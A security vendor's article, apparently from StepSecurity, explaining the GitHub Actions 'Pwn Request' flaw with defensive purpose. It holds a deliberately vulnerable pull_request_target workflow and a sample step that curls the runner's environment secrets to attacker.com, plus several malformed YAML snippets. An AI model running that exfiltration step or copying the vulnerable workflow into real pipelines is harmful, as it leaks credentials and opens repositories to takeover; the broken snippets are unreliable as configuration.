GitHub Actions Pwn Request Vulnerability

GitHub Actions allows developers to automate workflows within GitHub. This helps to simplify Continuous Integration and Continuous Deployment (CI/CD) pipelines and other automation tasks. However, these actions can be exploited through vulnerabilities. One such vulnerability is the "Pwn Request."

This article covers the "Pwn Request" vulnerability, its impact, and provides practical steps to help you secure your workflows against such threats. 

What is a “Pwn Request”?

The 'Pwn Request' vulnerability exposes flaws in how workflows handle pull requests or contributions from external sources. If these workflows are not properly monitored or managed, it can cause data breaches.

Attackers can manipulate pull requests to exploit vulnerabilities. This manipulation is used to get unauthorized access, execute harmful actions, or compromise sensitive information. 

The term “pwn” was adopted by the cybersecurity community to explain unauthorized access to a system or account. Based on this, attackers can "pwn" the workflow by making it perform actions it shouldn’t. 

Pwn request impacts GitHub Actions security by causing security breaches, supply chain attacks and secrets exposure. 

Risky Triggers in GitHub Actions Workflows

Certain triggers in GitHub Actions workflows pose a higher risk and can lead to vulnerabilities if not managed properly. These triggers are particularly risky because they execute workflows in ways that may allow attackers to exploit them. Below is a list of risky triggers:

• pull_request_target
• workflow_run
• issue_comment
• issues
• discussion_comment
• discussion
• fork
• watch

Why These Triggers Are Risky

1. pull_request_target:
   This trigger allows workflows to run with elevated privileges, even for pull requests from forked repositories. Attackers can exploit this by injecting malicious code into their pull request.
2. workflow_run:
   This trigger can be exploited when a workflow is triggered by another workflow. Attackers can chain workflows to perform unintended actions.
3. issue_comment and issues:
   These triggers allow workflows to run in response to comments or issues raised in a repository. Attackers can use these events to execute workflows with unintended consequences.
4. discussion_comment and discussion:
   Similar to issue-related triggers, these can allow malicious actors to exploit workflows by crafting events that execute sensitive actions.
5. fork:
   Workflows triggered by forked repositories often grant access to sensitive resources, such as secrets. Attackers can use forks to escalate their privileges and exploit the main repository.
6. watch:
   Triggers based on watch events can be abused for unnecessary workflow executions, causing resource exhaustion or indirect exploitation.

Key Features of the Vulnerability

1. Pull Request Exploitation: Attackers exploit workflows triggered by pull requests from forked repositories.
2. Default Permissions: Permissions to pull requests are regularly exploited. Unnecessary permissions give unauthorized access to secrets or repository data.
3. Large-Scale Impact: Vulnerabilities in popular open-source repositories could lead to major data breaches.

Demonstrating the "Pwn Request" Vulnerability

Setting Up a Vulnerable Workflow

The code below shows how "Pwn Request" works. This is done by using a vulnerable GitHub Actions workflow. The code uses a sample YAML file illustrating a scenario. 

run: |  
  name: CI
on:
  push:
    branches: main
  pull_request_target:
    branches: main
  workflow_dispatch:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
          ref: ${{github.event.pull_request.head.ref}}
          repository: ${{github.event.pull_request.head.repo.full_name}}

      - name: Using Node.js 20.x
        uses: actions/setup-node@v3
        with: 
            node-version: 20
      - name: Clean Install
        run: npm ci
      - name: Build
        run: npm run build:release
     
      - name: Run a one-line script
        run: echo Hello, world!

      - name: Run a multi-line script

Key Issues

1. Triggered by pull_request_target: The trigger option allows workflows to run for pull requests from forked repositories. This makes the workflow vulnerable as triggers are risky and should be used with caution. 
2. Checkout Vulnerability: The workflow checks out the pull request’s head ref and repository. This could give an attacker access to modify the workflow files and inject malicious code into the repository. 
3. Node.js Setup and NPM Command: Running npm and node.js older versions have vulnerabilities. Running npm directly from untrusted code can be used to manipulate code by attackers. 

Exploitation Process

This highlights in detail how attackers exploit vulnerable workflow.

1. Fork the Target Repository

The term ‘fork’ in Git is the process of creating a personal copy of someone’s repository on your GitHub account. In this case, the attacker forks a repository with the vulnerable workflow.

2. Create a Malicious Pull Request
   The next step an attacker does is to modify files or add scripts in the fork to execute malicious code. A pull request is then submitted to the main repository.

3. Trigger the Workflow:
   The vulnerable workflow runs the malicious code during the build or test stage.

Demonstrating a malicious script injected into the workflow, designed to exfiltrate secrets via a POST request

4. Gain Unauthorized Access:
   Once the changes are merged and the code runs, attackers can gain access with the default permission. Attackers can get to access repository secrets or modify data, and the code runs.

Example Malicious Pull Request

There are various types of malicious codes injected in a pull request. Some attempt to steal secrets, modify files and install malware or spyware. The sole aim is to steal data.

This code below shows an example of a malicious pull request with an attempt to steal secrets in a GitHub repository.

run: |  
  - name: Steal GitHub Secrets
  run: |
    curl -X POST -H "Content-Type: application/json" \
    -d "{\"secrets\": \"$(env)\"}" \
    https://attacker.com/steal-secrets

Analysis of the Vulnerability

Why Workflows are Vulnerable

1. Default Permissions: Many workflows grant write access to the repository. This permissions give external contributors access to write and edit files directly.
2. Lack of Validation: Pull request triggers cannot differentiate between trusted and untrusted sources.
3. Automation Risks: Heavy reliance on CI/CD pipelines to automate tasks increases the rate of vulnerabilities.

Impact of the Exploit

The consequences of a successful exploit include:

• Compromised Repositories: Attackers can exfiltrate sensitive data or inject malicious code. This can lead to loss of sensitive data and codebase of apps, softwares, and major projects. 
• Production Environment Breaches: In cases where production deployments are automated, this leads to breaches. Breaches cause a whole lot of damage to companies. These includes lack of trust from customers, loss of data and money, and even lawsuits. 
• Widespread Dependencies Risk: Vulnerabilities in popular repositories can spread to dependent projects.

Mitigation Strategies

Best Practices for Securing Workflows

1. Restrict Permissions: Use the principle of least privilege. For example, configure the workflow with read-only access. Permit write access to only trusted contributors.

run: |  
  -permissions:  
contents: read

2. Validate Pull Requests: Add manual approval steps for pull request triggered workflows.

run: |  
  -jobs:
  build:
    if: ${{ github.actor != 'dependabot[bot]' }}

3. Disable Unnecessary Triggers: Avoid triggering workflows for pull requests from forked repositories.
4. Review Codes: It is essential to review codes thoroughly before merging. Schedule a certain time to regularly audit codes to ensure maximum security.
5. Tools and Techniques: Use security tools for your workflows. Use the GitHub Token for authentication and authorization. Also, StepSecurity has extensive features and tools to secure your GitHub Actions. StepSecurity is an essential and must-have tool to improve workflow security.

How StepSecurity Helps to Secure your Workflows

StepSecurity is a state-of-the-art security platform designed to fortify the security of software development workflows. It focuses on safeguarding CI/CD pipelines by leveraging automated tools and best practices to detect vulnerabilities, mitigate supply chain threats, and ensure compliance. Here’s how StepSecurity effectively prevents "Pwn Request"-style vulnerabilities:

1. Vulnerability Scanning: StepSecurity scans workflows across your organization to identify vulnerabilities that could lead to exploits, such as the risky pull_request_target trigger. As shown in the screenshot below, StepSecurity highlights risky configurations and displays them on an intuitive dashboard. By clicking on the flagged controls, you can view detailed insights about the affected repository, the vulnerable workflows, and the risky triggers in question.

‍

2. Credential Exfiltration Prevention: StepSecurity’s Harden-Runner adds network egress control and runtime security, preventing sensitive data like GitHub tokens from being exfiltrated by malicious code. This feature has proven effective, detecting exfiltration attempts in projects like Google’s open-source Flank.
3. Restrict Permissions on GitHub Tokens: StepSecurity enables you to audit and manage GitHub tokens in your organization. It identifies tokens with read/write permissions that could pose a security risk. As shown in the screenshot below, the platform provides a 'Fix PR' button, allowing you to adjust token permissions with a single click, ensuring adherence to the principle of least privilege.

Conclusion

The "Pwn Request" vulnerability underscores the importance of securing GitHub Actions workflows. Without proper controls, these workflows are at risk of exploitation, leading to data breaches and compromised repositories. Tools like StepSecurity provide critical protection through features like vulnerability scanning and credential exfiltration prevention, ensuring workflows are secure from modern threats. Safeguard your pipelines today to prevent attacks tomorrow.

Ready to secure your workflows? Start your free trial of StepSecurity and experience its powerful features for yourself